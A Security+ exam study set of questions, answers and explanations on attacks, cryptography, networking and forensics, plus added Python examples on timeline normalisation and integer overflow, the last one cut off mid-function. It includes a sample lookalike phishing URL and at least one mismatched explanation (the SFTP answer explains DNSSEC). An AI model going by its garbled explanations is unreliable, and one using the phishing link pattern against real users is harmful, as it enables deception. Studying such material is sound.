Sec +


What type of attack can exploit the memory area that an application reserves for use on a server? -Integer overflow -Privilege escalation -Directory traversal -Buffer overflow

-Buffer overflow

Which account setting in Active Directory Domain Services (AD DS) domain policies must an administrator set in order to block a certain number of passwords that a user has already used? -Reuse -Complexity -History -Time of day

-History (An account's password history is governed by the "Enforce password history" policy in Active Directory (AD). The history attribute sets how many previous passwords are blocked.)

An accountant inadvertently and unknowingly introduced malware to the company network by attaching a compromised Universal Serial Bus (USB) media stick to a workstation. Describe the most comparable attributes of this type of threat actor. (Select all that apply.) []An internal threat []Not capable of developing malware []Paid off significantly []Intent on harming the company

[]An internal threat (An internal or insider threat is one that has been granted permissions on a system or network. The accountant needed permissions to use USB media sticks on the workstation so that the malware can load onto the system.) []Not capable of developing malware (The accountant's primary role is not IT related and is most likely not capable of developing any type of malware.)

What type of strategy is a blackhole? (Select all that apply.) []Isolation []Segmentation []Containment []Data Loss Prevention

[]Containment (Containment is a strategy that controls access to files, data, systems, or networks across points of entry, using isolation or segmentation techniques.) []Isolation (Isolation is the act of disconnecting an entire system or network. Isolation is a malware containment procedure.)

Government intelligence has revealed that a foreign entity is planning to cripple a major company to disrupt the economy. Hybrid warfare tactics are inevitable in this case. Which social platform would a foreign malicious group use to effectively spread inaccurate information quickly among unsuspecting family and friends? (Select all that apply.) []WhatsApp []Facebook []Telegram []Twitter

[]Facebook []Twitter

List the terms that refer to a document that guides investigators to determine priorities and remediation plans by listing the procedures, contacts, and resources available to responders for various incident categories. (Select all that apply.) []Data Loss Prevention []Runbook []Incident Response Plan []Access Control List

[]Runbook (A SOAR system that implements a playbook with a high degree of automation is also referred to as a runbook, although the two terms are used interchangeably.) []Incident Response Plan (Referred to as a playbook, an incident response plan (IRP) guides investigators to determine priorities and remediation plans by listing the procedures, contacts, and resources available to responders for various incident categories.)

At the Windows desktop screen, a user reports a small pop-up window that shows information about a blocked IP (Internet protocol) address before disappearing. The user fears that Internet access dropped. Describe the type of pop-up window the user reported. -A USB connection notification -A Wi-Fi disconnection notification -A Windows update notification -A host-based firewall notification

-A host-based firewall notification (A host-based firewall application, with rules to block specific IP subnet ranges, or specific port or protocol connections, may be configured by default for user notification when the system enforces a denial rule.)

An attacker evaded antivirus detection in a Linux kernel, as multiple threads attempted to write an object at the same memory location. What type of vulnerability did the attacker use? -A race condition -A buffer overflow -A pointer dereference -An integer overflow

-A race condition (A race condition vulnerability occurs when multiple threads are attempting to write at the same memory location. Race conditions can be used as an antivirus evasion technique.)

A hacker used a Man-in-the-Middle (MitM) attack to capture a user's authentication cookie. The attacker disrupted the legitimate user's session and then re-sent the valid cookie to impersonate the user and authenticate to the user's account. What type of attack is this? -A birthday attack -A Man-in-the-Middle (MitM) attack -A downgrade attack -A replay attack

-A replay attack (In a replay attack, the attacker captures some data used to log on or start a session legitimately. The attacker then disrupts the legitimate session and resends the captured data to re-enable the connection.)

Mobile Android operating system (OS) encryption software might allow encryption of which of the following? -RCS -Passwords -MicroSD -SMS

-MicroSD (Micro Secure Digital (MicroSD) is an external media device supported by many Android devices. Built-in and third-party encryption applications on the mobile OS may encrypt these types of removable storage.)

Mobile engineers are designing a phone that can support internal key-pair certificates for authentication and encryption/decryption capabilities for an internal organization or corporation. Which component may the engineers want to include in the design of this phone? -USB OTG -SEAndroid -Tethering -MicroSD HSM

-MicroSD HSM (Micro Secure Digital (MicroSD) Hardware Security Module (HSM) is designed to store cryptographic keys, such as a key-pair certificate, in a secure manner. It requires no extra drivers or uncommon hardware components to use.)

What protocol alters public IP addresses to private IP addresses and vice versa, in an attempt to protect internal computers from the Internet? -URL Filter -Firewall -NAT -Proxy

-NAT (Network addressing protocol (NAT) translates public IP addresses to private and vice versa. By using the NAT protocol on the firewall, a company can hide assets from the public internet.)

Which of the following is NOT a critical profiling factor when assessing the risk that any one type of threat actor poses to an organization? -Motivation -Intent -Structure -Non-repudiation

-Non-repudiation (Non-repudiation is a term that describes a property of a secure network where a sender cannot deny having sent a message.)

Describe what distinguishes tabletop training from walkthrough training. -Participants demonstrate their chosen course of action -The scenario is more realistic. -Participants describe their course of action, using no computer equipment. -The scenario is from the point of view of the attacker.

-Participants describe their course of action, using no computer equipment. (In tabletop instruction, the facilitator poses a situation and the respondents describe what steps they might take to identify, contain, and eradicate the potential threat. Scenario data are mostly implemented as flashcards and do not require computing equipment.)

A basic dictionary attack includes using which of the following? -Plaintext -Collisions -Man-in-the-middle -Rainbow table

-Plaintext (A dictionary attack is performed when software generates hash values from a dictionary of plaintexts to match with a captured hash to gain access.)

A global corporation assesses risk appetite and how risks in various regions could influence mission-critical operations. They are assessing compliance with local laws and licensing requirements to prevent financial risk or resolve security risks, and changing the risk posture and implementing risk controls to compensate. Conclude what type of assessment the team is performing. -Risk control assessment -Vulnerability assessment -Penetration testing -Site risk assessment

-Risk control assessment (Risk and control self-assessment (RCSA) is the method by which companies evaluate and analyze the operational risks and the efficacy of the controls used to manage them.)

A company desires a basic protocol for email. The owner requested that a local system store and manage email for each user. Compare the various mail protocols and recommend the best solution for the company. -Simple Mail Transfer Protocol -Secure Multipurpose Internet Mail Protocol -Secure Post Office Protocol v3 -Secure Internet Message Access Protocol v4

-Secure Post Office Protocol v3 (Secure Post Office Protocol v3 (POP3) is a mailbox protocol designed to allow mail to be stored on a server and downloaded to the recipient's email client at their convenience.)

A hacker can use Microsoft Office applications as an attack vector to automatically run multiple tasks in the background using which of the following? -PowerShell -ARP poisoning -Bash -VBA

-VBA (Microsoft Office uses the Visual Basic for Applications (VBA) language to script macros, for example, in a Word document to carry out multiple tasks automatically.)

A healthcare organization was asked to share its data with an analytics company to perform research on patient well-being. Which of the following encryption methods would most likely protect patient information during analysis? -AES -Ephemeral key -Symmetric -Homomorphic

-Homomorphic (Homomorphic encryption is an encryption method that allows computation to be performed directly on encrypted data without requiring access to a secret key. Analysis can apply functions on encrypted data without needing to reveal the values of the data.)

A company requires a means of managing storage centrally and the ability to share the storage with multiple hosts where users can access data quickly and with little to no latency. Which of the following storage architectures would best meet the company's needs? -RAID -SAN -NAS -Disk

-SAN (A storage area network (SAN) solution provides access to block-level data storage that can be accessed by multiple users. A SAN offers flexibility, availability, and performance to consumers.)

A system administrator moves a file from a server to a client using Secure Shell (SSH) over port 22. Compare the protocols for file transfers to deduce the protocol utilized. -SFTP -FTPES -FTPS -TFTP

-SFTP (Domain Name System Security Extensions (DNSSEC) helps to mitigate against spoofing and poisoning attacks by providing a validation process for DNS responses. The authoritative server for the zone creates a package of resource records, called an RRset, signed with a private key known as the zone signing key.)

A cellular company updates cell towers across the country. They plan to update the baseband of their mobile users to fully support the new towers. How may the company effectively deploy this new update? -Via USB -Send updates through OTA -Send updates over Wi-Fi -Add to next Android version

-Send updates through OTA (OTA (over the air) refers to the process of updating basebands on mobile devices through the cellular network. This option is more effective and efficient and requires very little interaction by the user.)

How might responsibilities be divided among individuals to prevent abuse of power in an organization? -Job rotation -Separation of duties -Clean desk space -Least privilege

-Separation of duties (Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. Dividing duties among individuals prevents ethical conflicts or abuses of power.)

An attacker installed a fraudulent Radio Frequency ID (RFID) reader to steal credit card numbers any time someone used a card to make a purchase. What type of attack does this describe? -Bluesnarfing -Skimming -Bluejacking -Wiphishing

-Skimming (Skimming is an RFID attack where an attacker uses a fraudulent RFID reader to read the signals from a contactless bank card.)

A cyber security team would like to gather information regarding what type of attacks are occurring on a network. Which of the following implementations would assist in routing information on the attackers to a Honeynet? -Spear phishing -DDoS -DNS sinkhole -Honeypot

-DNS sinkhole (A Domain Name Service (DNS) sinkhole is used to intercept DNS requests attempting to connect to known malicious or unwanted domains and to return a fake IP address.)

A team lead oversees onboarding new system administrators in an IT company. Part of the process is explaining the complex IT infrastructure. Which of the following configuration management strategies would BEST help the team lead explain the infrastructure? -Master Image -Change management -Baseline configuration -Diagrams

-Diagrams (The use of diagrams provides a visual representation of complex relationships between network topologies, workflows, internet protocols, and architecture within a system. Diagrams must be updated as system components change. Baseline configurations are documented and agreed-upon sets of specifications for information systems.)

An unmanned aerial vehicle is equipped with a component to ensure position and movement sensors are aligned and relays information to a ground control. Which of the following computing devices does this best describe? -Microprocessor -Embedded system -SoC -Microcontroller

-Embedded system (An embedded system is a combination of hardware and software that contains a dedicated function and uses a computer component to complete the function.)

A junior pen tester performs a routine reconnaissance audit on a client's network with a black box strategy. Compare and contrast the descriptions and determine which fits the tester's approach. -Testing for a bug bounty -Testing as an unprivileged insider threat -Testing as an external threat -Testing as a privileged insider threat

-Testing as an external threat (In a black box environment, the pen tester is given no privileged information about the network. This type of test is useful for simulating the behavior of an external threat.)

What is the term describing a point in an investigation during which the suspect cannot deny his involvement? -Provenance -Preservation -Legal hold -Non-repudiation

-Non-repudiation (Establishing a timeline and recording the acquisition process establishes provenance of the evidence to ensure its admissibility. This proof of integrity ensures non-repudiation.)

A consumer uses a Samsung SmartThings coordinator to turn on lights in the home and start the dishwasher. Which communications protocol is the hub using? -Bluetooth -Narrowband -Baseband -Zigbee

-Zigbee (Zigbee is a two-way wireless radio frequency communication between a sensor and a control system. It is an Institute of Electrical and Electronics Engineers (IEEE) 802.15.4-based specification for communication protocols and is used for home automation.)

WPA (Wi-Fi Protected Access) fixes the security problems with WEP (Wired Equivalent Privacy) by adding TKIP (Temporal Key Integrity Protocol) to the RC4 cipher to make it stronger. TKIP fixes the checksum problem, uses a larger Initialization Vector (IV), transmits it as an encrypted hash, and adds a sequence counter to resist replay attacks. What replaced RC4/TKIP to make WPA2 significantly more secure than WPA? -AES/CCMP -SHA-2/IEEE 802.1x -SHA-2/CCMP -AES/IEEE 802.1x

-AES/CCMP (For WPA2, AES (Advanced Encryption Standard) deploys within CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). AES replaces RC4, and CCMP replaces TKIP. AES is for encryption, and CCMP is for message integrity.)

A Windows firewall rule allows all programs, all protocols, and all ports within a 192.168.0.0/24 subnet to connect to the network. What type of Windows Firewall with Advanced Security is this? -Secure Socket Layer -Access Control List -Transport Layer Security -Data Leak Prevention

-Access Control List

Which failover type does an engineer configure so that all nodes are always on? -Active/passive -Full tunnel -Active/active -Split tunnel

-Active/active (With failover, an active/active cluster means that both nodes are processing connections concurrently. This allows the administrator to use the maximum capacity from the available hardware while all nodes are functional.)

A network administrator sets up a stateless firewall using an open-source application running on a Linux virtual machine. The immediate benefit of this setup is that it was easy to set up quickly with basic rules. What other reasons may have influenced the administrator's decision to deploy a stateless rather than a stateful firewall? (Select all that apply.) -Allow network protocols -Analyze HTML code -Hardware performance -Block TCP ports

-Allow network protocols (A packet filtering firewall may also set rules for protocol ID or type. For example, it may allow HTTPS traffic.) -Block TCP ports (A packet filtering firewall is configured by specifying an access control list (ACL). An ACL may define port filtering or security rules to block, for example, TCP port 3389 which is used for remote desktop protocol.)

In a particular workplace, all user actions are recorded and accounted for. Any time a resource is updated, archived, or a user has their clearance level changed, it must be approved by a root user. Users that leave, arrive, or change jobs (roles) must have their user accounts regularly recertified, and any account changes must be approved by an administrator. What are these measures known as? -Job rotation -Change control -Acceptable use policy -Separation of duties

-Change control (Change control of quality management systems and information technology systems is a process used to ensure that changes to the product or system are implemented in a managed and organized manner.)

Which attack vector makes it possible for a threat actor to compromise a whole platform with just one account? -E-mail -Cloud -Supply chain -Social media

-Cloud (On a cloud platform, an attacker only needs to find one account, service, or host with weak credentials to gain access. The attacker is likely to target the accounts used to develop services in the cloud or manage cloud systems.)

An organization that is planning a move to the cloud checks to see that the chosen CSP uses a standard method for creating and following security competencies. Which method does the CSP likely implement? -Reference architecture -Service Organization Control (SOC2) -Cloud controls matrix -National, territory, or state laws

-Cloud controls matrix (The cloud controls matrix consists of specific controls and assessment guidelines that should be implemented by CSPs. The matrix acts as a starting point for agreements, as it provides a baseline level of security competency that the CSP should meet.)

A recent change to an API exposes an exploit in a web application. Developers working on the project discover that dead code in the application had been executed as a result of which practice? -Unreachable code -Normalization code -Code reuse -Code obfuscation

-Code reuse (Code reuse is the copying of code from one location into another. Careless or mismanaged code reuse can introduce instances of dead code.)

Server B requests a secure record exchange from Server A. Server A returns a package along with a public key that verifies the signature. What does this scenario demonstrate? -DNS Spoofing -Dynamic Host Configuration Protocol -DNS Security Extensions -DNS Server Cache Poisoning

-DNS Security Extensions (Domain Name System Security Extensions (DNSSEC) helps to mitigate against spoofing and poisoning attacks. The authoritative server for the zone creates a package of resource records, called an RRset, signed with a private key known as the zone signing key.)

A small department at a company manages a server, separate from IT, for data access and backup purposes. What role does the department fulfill? -Data controller -Data processor -Data owner -Data custodian

-Data custodian (The data custodian role handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures.)

A tablet uses a key-based technique for encrypting data. It focuses on a pair of public and private keys for decryption and encryption of web traffic using less power than other encryption methods. Which encryption method is this? -Ephemeral -Asymmetrical -Homomorphic -ECC

-ECC (Elliptic curve cryptography (ECC) is an asymmetric public and private key-based cryptographic technique for encrypting data. ECC generates keys through the properties of the elliptic curve equation providing smaller and more efficient cryptographic key processes.)

A cloud service provider informs its consumers that Amazon Linux version 1 products will no longer be supported after 31 December. Consumers using these products must have a plan in place to upgrade to the newest Amazon Linux product, version 2. After the deadline, Amazon Linux 1 products will only receive critical patches. Which of the following best describes the degradation of the product? -Legacy system -EOL -Multiparty risk -EOS

-EOL (The end of life (EOL) for a software product occurs when a product will no longer be produced or sold. These products are most likely to be replaced by a newer version or model.)

A zone separated from the local network provides business partners access to company resources without disclosing internal information. What type of zone does this illustrate? -DMZ -Intranet -Extranet -VLAN

-Extranet (An extranet is a zone created to allow authorized users access to company assets separate from the intranet.)

A Cloud Service Provider (CSP) outsources all cyber security elements for the infrastructure in which an application resides to a third party due to a lack of resources. The CSP maintains responsibility for the environment and its attributes. What is this an example of? -Pay as you go -SECaaS -MSSP -Resource pooling

-MSSP (A managed service provider (MSP)/Managed security service provider (MSSP) offers fully outsourced responsibility for information assurance to a third party.)

Which of the following wireless technologies does not provide encryption and is known as a "bump"? -RFID -NFC -IV -Bluetooth

-NFC (Near Field Communication (NFC) is known as a bump, named after an early mobile sharing app. It was later redeveloped as Android Beam. It is commonly used for mobile wallet apps like Google Pay.)

A system administrator applies a Windows patch to the virtual machines (VM) in a virtual desktop infrastructure (VDI). After the patch is complete, the VMs no longer authenticate with the server. Which of the following is the best next step to take for the system administrator? -Execute penetration test. -Complete a vulnerability scan. -Revert to last known good configuration. -Take a snapshot.

-Revert to last known good configuration. (The administrator should revert to the last known good configuration before the patch. The virtual machines (VM) were working before the patch. Reverting to the last known good configuration will get the system back up and running.)

Analyze the methods and determine which a technician uses as a non-persistent recovery method on a server using a system baseline. -Build from a template -Live boot media -Revert to known state -Rollback to known configuration

-Rollback to known configuration (Rollback to known configuration is a mechanism for restoring a baseline system configuration, such as Windows System Restore.)

Cuckoo is a software package that provides a system configuration allowing the system to be completely isolated from its host. It provides a safe environment for potentially dangerous research, such as on malware, while recording file system and registry changes, as well as network activity. What is this type of isolated system called? -Exploitation framework -ARP cache -Vulnerability test -Sandbox

-Sandbox (A sandbox, such as Cuckoo, is an isolated environment created to safely analyze malware and exploits. Sandboxing is an isolation technique commonly used in cybersecurity research, particularly malware research.)

With no specific target in mind, and without a reasonable goal, an attacker launched an unstructured phishing attack with an attachment of a replicating computer worm. If the attacker did not fully understand how this malware worked, and just wanted to gain attention, what classification of threat actor is this person? -Organized crime -Advanced Persistent Threat (APT) -Hacktivist -A script kiddie

-Script Kiddie (A script kiddie uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or any reasonable goal, other than gaining attention or proving technical abilities.)

A company provides smartphones to their employees. IT administrators have the ability to deploy, secure, and remove specific applications and data from the employees' smartphones. Analyze the selections and determine how IT can perform this type of control. -Push notifications -Content management -Baseband update -Storage segmentation

-Storage segmentation (Storage segmentation separates personal data from organizational data on a mobile device. It gives IT administrators control over corporate assets on employees' mobile devices.)

A company that maintains a classified environment staffs the front entrance with a person to review credentials and a person to verify authorized access. Employees must pass through a Faraday cage before being allowed into the classified area. Which type of physical security does this best represent? -Tailgating -Mantrap -Two-person control -Visitor logging

-Two-person control (Two-Person Integrity/Control is the continuous surveillance and control of a controlled environment or material by a minimum of two authorized individuals.)

What can a threat actor use to perform the popular social engineering technique of dropping USB media around a college campus? -UAV -OSINT -Gray box -Van

-UAV (An unmanned aerial vehicle (UAV), or drone, provides a vector for a popular social engineering technique that drops infected USB media around college campuses. UAVs are also used for war flying.)

Today's hackers are keen on knowing that security teams are actively hunting for threats on the network. Hackers may use resources to trigger a diversion to keep threat hunters busy, while another attack is initiated to carry out the primary objective of the planned penetration attack. How can a security team best circumvent this strategic hacking technique? -Use a defensive maneuver. -Review security advisories. -Apply intelligence fusion techniques. -Monitor threat feeds from ISACs.

-Use a defensive maneuver. (A defense maneuver uses passive discovery techniques so that threat actors do not know they have been discovered. This gives the security team a chance to investigate the source of the attack and plan a resolution before the threat moves on to the next objective.)

The RADIUS server is down, and employees need immediate access to Wi-Fi routers in the office building. The WAPs (Wireless Access Points) service smartphones and tablets. After disabling Enterprise mode, how will users connect to the WAPs? -Set devices to 802.11n -Use 5 GHz band -Use a pre-shared key -Use company credentials

-Use a pre-shared key (A PSK (Pre-shared Key) is the password needed to gain access to a WAP (Wireless Access Point) that is WPA2 enabled, for example.)

A company with offices in multiple countries deployed a cyber threat intelligence (CTI) appliance in the cloud to detect network attacks. The security team examined last week's data and spent a significant amount of time trying to better predict future attacks and ways to improve security. How can the team take advantage of cloud resources to better analyze these threats? -Use artificial intelligence -Use code repositories -Use OSINT -Use proprietary software

-Use artificial intelligence (Artificial intelligence (AI), especially machine learning, is available with cloud service providers (CSP) such as the Google Cloud Platform. AI can help analyze threat data in real-time to make better predictions, and initiate workflows to stop attacks as they happen.)

An application developer uses a third-party source to send cryptographic data through multiple processors to stretch the data and ensure secure algorithms. What is the developer preventing the use of? -Collision -Weak keys -Salting -Rainbow table attack

-Weak keys (Weak keys are poorly generated or short cryptographic keys used with a specific cipher. They are vulnerable to cybersecurity attacks. Stretching keys can strengthen them to make the cipher more secure.)

A systems administrator learns Linux commands to view log files. Which command should be used if line numbers are required to view an entire file? -tail -head -grep -cat

-cat (The Linux command cat allows for viewing the entire contents of one or more files. For example, to view the contents of two log files, use cat -n access.log access2.log. The -n switch adds line numbers.)

Companies often update their website links to redirect users to new web pages that may feature a new promotion or to transition to a new web experience. How would an attacker take advantage of these common operations to lead users to fake versions of the website? (Select all that apply.) []Ruin the company's reputation with reviews. []Hijack the website's domain. []Add redirects to .htaccess files. []Craft phishing links in email.

[]Add redirects to .htaccess files. (The .htaccess file controls high-level configuration of a website. This file runs on an Apache server and can be edited to redirect users to other URLs.) []Craft phishing links in email. (An attacker can craft a phishing link that might appear legitimate to a naïve user, such as: https://trusted.foo/login.php?url="https://tru5ted.foo".)

Failed logins or instances of denial of access to restricted files may be indicators of compromise. Suggest where records of such incidents might be found. (Select all that apply.) []DNS cache []Dump files []Authentication logs []Security logs

[]Authentication logs (Even though investigating every security and network log manually would take forever, by comparing irregularities in authentication logs (such as incomplete authentication), investigators can correlate corresponding entries.) []Security logs (Windows system and security logs can provide insight on certain events, providing a timeline with who may have logged on or tried to log on to the system.)

Which boot integrity concepts utilize the trusted platform module (TPM)? (Select all that apply.) []Boot attestation []Secure Boot []Measured boot []UEFI

[]Boot attestation (Boot attestation is the capability to transmit a boot log report signed by the TPM via a trusted process to a remote server, such as a network access control server.) []Measured boot (A trusted or measured boot process uses platform configuration registers (PCRs) in the TPM at each stage in the boot process to check whether hashes of key system state data have changed.)

Choose the components a threat actor may use to set up a distributed denial of service attack (DDoS) on a local network. (Select all that apply.) []Spyware []Botnet []Remote access trojan []Command and control

[]Botnet (A botnet is a group of bots that are all under the control of the same malware instance. A bot is an automated script or tool that performs some malicious activity.) []Remote access trojan (A remote access trojan (RAT) is backdoor malware that mimics the functionality of legitimate remote control programs but is designed specifically to operate covertly.) []Command and control (A command and control (C2 or C&C) host or network controls the bots or botnet to carry out remote tasks on the local network.)

Identify types of metadata that would be associated with CDR (call detail records) of mobile devices. (Select all that apply.) []GPS location data []Call durations []List of towers connected to []SMS text timestamps

[]Call durations (Call detail records (CDR) routinely contain times and durations of incoming, outgoing, and attempted calls, as well as the phone numbers of said calls.) []List of towers connected to (By examining the list of towers a device has connected to in the call detail records (CDR), it is possible to ascertain the general vicinity of locations in which the device has been present.) []SMS text timestamps (SMS text time, duration, and phone number of origin are recorded in the call detail records (CDR) metadata associated with mobile devices.)

Which certificate attribute describes the computer or machine it belongs to? (Select all that apply.) []Common name []Subject alternate name []Certificate authority name []Company name

[]Common name (The common name (CN) attribute identifies the computer or machine by name, usually a fully qualified domain name (FQDN), such as www.comptia.org.) []Subject alternate name (The subject alternative name (SAN) extension is structured to represent different types of identifiers, including domain names and IP addresses. Modern TLS clients match the host name against the SAN rather than the CN, so the CN is deprecated for identifying the host.)

Investigators perform analysis on a breached system. When looking at data timestamps, what should be noted about any time offset? (Select all that apply.) []Clock synchronization []Daylight saving time []Valid time source []UTC time

[]Daylight saving time (The local time offset on a system changes when daylight saving time starts or ends, so the same local clock reading can map to two different UTC times across the transition. Investigators must note the offset between local system time and UTC at the time of each event.) []UTC time (Local time is the time within a particular time zone, offset from UTC by a number of hours. NTFS stores timestamps in UTC internally, while other sources may record local time. It is vital to establish how each timestamp is calculated and to note the offset before building a timeline.)
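
As an added example (not part of the original quiz material), the following normalizes timestamps from several sources onto one UTC timeline. The log entries are constructed; the workstation is assumed to be in US Eastern time across the March 2024 DST change, so its recorded offset moves from -05:00 to -04:00 between its two events.

```python
from datetime import datetime, timezone


def offset_recorded(timestamp: str) -> bool:
    """True if the ISO 8601 timestamp carries an explicit UTC offset."""
    return datetime.fromisoformat(timestamp).tzinfo is not None


def to_utc(timestamp: str) -> datetime:
    """Convert a timestamp with an explicit offset to UTC.

    A timestamp without an offset is ambiguous (which zone? was DST in
    effect?), so it is rejected rather than silently assumed to be UTC.
    """
    if not offset_recorded(timestamp):
        raise ValueError(f"no UTC offset recorded for {timestamp!r}; "
                         "establish the system's zone and DST state first")
    return datetime.fromisoformat(timestamp).astimezone(timezone.utc)


def build_timeline(entries: list) -> list:
    """Order events from several sources on a single UTC timeline.

    entries: (timestamp with offset, source, description)
    returns: (UTC ISO timestamp, source, description), oldest first
    """
    normalized = [(to_utc(ts).isoformat(), source, event) for ts, source, event in entries]
    return sorted(normalized)


# Constructed evidence. Sorted by the local clock readings alone, the order of
# these four events would be wrong; the recorded offsets make it unambiguous.
SAMPLE_ENTRIES = [
    ("2024-03-09T23:45:00-05:00", "workstation", "Event 4624: interactive logon (EST)"),
    ("2024-03-10T04:40:00+00:00", "firewall", "outbound 443 to unknown host allowed"),
    ("2024-03-10T03:05:00-04:00", "workstation", "Event 4688: powershell.exe started (EDT)"),
    ("2024-03-10T06:15:00+01:00", "linux-host", "sshd: accepted publickey for svc_backup"),
]

if __name__ == "__main__":
    for utc_ts, source, event in build_timeline(SAMPLE_ENTRIES):
        print(f"{utc_ts}  {source:12s}  {event}")
```

The firewall entry (04:40 UTC) actually precedes the workstation logon (23:45 EST is 04:45 UTC), which a naive sort on the local clock would reverse.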

While designing a new wireless system for deployment, an engineer utilizes the newest security technology available. Analyze the security properties and conclude which will be used. (Select all that apply.) []Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit []RC4 stream cipher using Temporal Key Integrity Protocol (TKIP) to make it stronger []Advanced Encryption Standard (AES) cipher with 128-bit keys []4-way handshake authentication mechanism with a protocol based on the Diffie-Hellman key agreement

[]Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit (AES CCMP in earlier WPA implementations is replaced in WPA3 with the AES Galois Counter Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must use 192-bit AES, while personal authentication can use either 128-bit or 192-bit.) []4-way handshake authentication mechanism with a protocol based on the Diffie-Hellman key agreement (Simultaneous Authentication of Equals (SAE) in WPA3 uses a 4-way handshake authentication and association mechanism with a protocol based on the Diffie-Hellman key agreement.)

A group of junior systems administrators participates in an ethical hacking seminar that allows for advancement and rewards for completing challenges. Which training methods do the administrators experience? []Gamification []Phishing simulations []Capture the flag []Role-based training

[]Gamification (Gamification is a learning approach that includes a fun factor and features gaming-type elements such as points, leveling up, and rewards.) []Capture the flag (Ethical hacker training programs and gamified competitions usually use Capture the Flag (CTF). Participants complete a series of challenges, each of which ends in retrieving a secret token (the flag) that proves the challenge was solved.)

Select the tools that do any form of network scanning, such as port scanning, IP scanning, etc. (Select all that apply.) []Netcat []Nmap []cat []ping

[]Netcat (The nc (or Netcat) command reads and writes data across network connections. Netcat can be used for things such as port scanning and fingerprinting.) []Nmap (Nmap is a versatile tool, allowing users to perform various types of network scans. The packet-sniffing library Npcap can be added to Nmap to provide packet sniffing and injection capability.) []ping (Ping can execute a sweep of all the IP addresses in a subnet with just a short script.)

An attacker used a dump truck to pick up trash at the home of a successful Chief Executive Officer (CEO). What information gathering techniques is the attacker NOT using in this case? (Select all that apply.) []Network reconnaissance []Credential harvesting []Dumpster diving []Impersonation

[]Network reconnaissance (Network reconnaissance involves using tools such as nmap or network mapper to gather information about network devices and computer services.) []Credential harvesting (Credential harvesting is a campaign specifically designed to steal account credentials, usually to sell them in the black market. This is commonly aimed at a larger target pool.)

Which of the following is TRUE about a certificate authority (CA) in a hierarchical model as opposed to a single CA model? (Select all that apply.) []PKI collapses if CA is compromised. []Offline CA is a best practice. []Root certificate is self-signed. []Intermediate CA issue certificates.

[]Offline CA is a best practice. (Keeping the root certificate authority (CA) offline in a hierarchical public key infrastructure (PKI) is a security best practice. Compromise of the root key would allow forged certificates for every subordinate CA and end entity in the hierarchy, so the root is brought online only to sign or revoke intermediate CA certificates.) []Intermediate CA issue certificates. (In a hierarchical PKI the root signs the intermediate CAs, and the intermediate CAs issue certificates to users and devices. Intermediate CAs can divide the work by area of responsibility, such as one per region or certificate type.)

A start-up company operates all of its web servers and services on a cloud platform using Platform as a Service (PaaS). The company offices run a local domain controller for directory services. Which type of attacks would the cloud service provider consider as cloud-based attacks as opposed to on-premise? (Select all that apply.) []Plaintext API keys in database []RAT on web servers []Backdoor to virtual platforms []Accessible USB ports for flash media

[]RAT on web servers (A remote access trojan (RAT) is backdoor malware that mimics the functionality of legitimate remote control programs but is designed specifically to operate covertly.) []Backdoor to virtual platforms (A backdoor is any type of access method to a host that circumvents the usual authentication method and gives the remote user administrative control.)

Where might one find operating system files during acquisition? (Select all that apply.) []Random-access memory (RAM) []Firmware []Cache []Pagefile

[]Random-access memory (RAM) (Operating system files active during acquisition may be present in the random-access memory (RAM).) []Cache (System caches are a place likely to contain operating system files. Some of these may be relevant to the investigation.) []Pagefile (Operating system files active during acquisition may be present in the pagefile or swap.)

A new administrator completed setting up an admin account on the network. The admin successfully logged on to a remote file server with the new credentials but not on a remote domain controller (DC) server. Determine the most likely cause for not being able to log in to a DC server. -Disabled account -Account audit -Account permission -Access policy

-Access policy (Access policies determine things such as the right to log on to a computer locally or via remote desktop, install software, change the network configuration, and so on.)

An IT department implements a software tool between the company's network and the cloud provider to monitor network traffic and enforce security policies. What software tool was implemented? -CASB -Protocol analyzer -Firewall -SSL/TLS accelerator

-CASB (A Cloud access security broker (CASB) is a tool that is placed between an organization's resources and a cloud service provider that enforces defined security-based policies while monitoring traffic.)

A mobile phone user smiles at the screen of the phone to unlock it for use. Which authentication method is being used? -Behavioral biometrics -Facial recognition -Retina scanner -Keystroke dynamics

-Facial recognition (Facial recognition is a biometric authentication method in which a user registers a physical characteristic with an authentication system and uses the characteristic to authorize access. Facial recognition can include several facial features.)

A social engineer used a phishing attack to trick users into visiting a website. Once users visit the site, a vulnerability exploit kit installs, which actively exploits vulnerabilities on the client. What type of attack did the users become a victim of? -HTTP Response Splitting -Cross-site Request Forgery (XSRF) -Locally Shared Objects (LSOs) -A Man-in-the-Browser (MitB) attack

-A Man-in-the-Browser (MitB) attack (A MitB attack compromises the web browser by installing malicious plug-ins or scripts or by intercepting API calls. An exploit kit installed on a website actively tries to exploit vulnerabilities in the browsers of clients visiting the site.)

A developer implements a single sign-on (SSO) login standard using Security Assertion Markup Language (SAML) for logging users into an application to eliminate the need for username/password credentials. This implementation is part of which of the following? -URL filtering -HTTPS -API consideration -SSL/TLS

-API consideration (An application programming interface (API) is code that enables data exchange between one software product and another, together with the terms of that exchange. Delegating sign-on to an identity provider over SAML is an API design consideration: the application must validate the signed assertion it receives instead of checking a password itself.)

An attacker caused a software program to calculate a value that exceeded the fixed lower and upper bounds, and caused a positive number to become a negative number. What vulnerability did the attacker exploit? -A pointer dereference -An integer overflow -A race condition -A buffer overflow

-An integer overflow (An integer overflow attack causes the target software to calculate a value that exceeds the upper or lower bound of the integer type. The value wraps around, which can turn a positive number negative or a large length into a small one.)
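
The following added example (written for this page, not taken from the quiz or any product) emulates 32-bit two's-complement arithmetic in Python to show the wrap the answer describes, alongside the length check that prevents it. The length fields are constructed values standing in for attacker-controlled input.

```python
INT32_MIN = -2**31
INT32_MAX = 2**31 - 1


def wrap_int32(value: int) -> int:
    """Reduce an unbounded Python int to a two's-complement 32-bit value.

    This is what an unchecked C `int` addition or multiplication produces
    when the true result leaves the [INT32_MIN, INT32_MAX] range.
    """
    return ((value + 2**31) % 2**32) - 2**31


def fits_int32(value: int) -> bool:
    return INT32_MIN <= value <= INT32_MAX


def unchecked_buffer_size(count: int, element_size: int) -> int:
    """Vulnerable pattern: count * element_size computed in a 32-bit int.

    An attacker-chosen count makes the product wrap to a small or negative
    number; the program then allocates that much and copies `count` elements
    into it, which is how an integer overflow becomes a heap overflow.
    """
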